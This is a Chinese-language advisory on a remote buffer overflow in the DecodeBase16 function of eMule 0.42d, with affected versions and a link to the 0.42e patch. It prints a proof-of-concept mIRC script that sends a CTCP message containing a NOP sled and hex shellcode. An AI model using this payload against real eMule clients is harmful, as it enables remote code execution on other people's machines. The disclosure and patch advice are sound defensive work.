eMule远程缓冲区溢出漏洞
涉及程序:
emule
描述:
eMule远程缓冲区溢出漏洞
详细:
eMule是一款可靠的点对点档案共享客户端。
eMule在进行内存拷贝时缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
问题存在于eMule v0.42d的DecodeBase16(...)函数中,这个函数接收十六进制字符串,长度和目标缓冲区作为参数,函数没有对输入的字符串进行任何检查,超长的字符串可导致触发缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
受影响系统:
Emule Emule 0.42d
不受影响系统:
Emule Emule 0.42e
攻击方法:
Kostya Kortchinsky (kostya.kortchinsky@renater.fr)提供了如下测试方法:
/bourriquet { .quote PRIVMSG $1 $+(:,$chr(1),SENDLINK|,
9090909090909090909090909090909090909090909090909090909
0909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090EB0790907AF65
700906681EC400031C96820210000684D756C656875722065686820
796F685061746389E2515152513EFF15C0E76100503EFF1568E4610
0909090909090909090909090909090909090909090909090909090
9090909090909090909090909090909090909090909090909090909
090909090909090,|,$chr(1))
解决方案:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Emule Upgrade eMule0.42e-Installer.exe
http://umn.dl.sourceforge.net/sourceforge/emule/eMule0.42e-Installer.exe
安全建议:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://umn.dl.sourceforge.net/sourceforge/emule/eMule0.42e-Installer.exe
附加信息:
无
收藏
推荐
评论(0条)
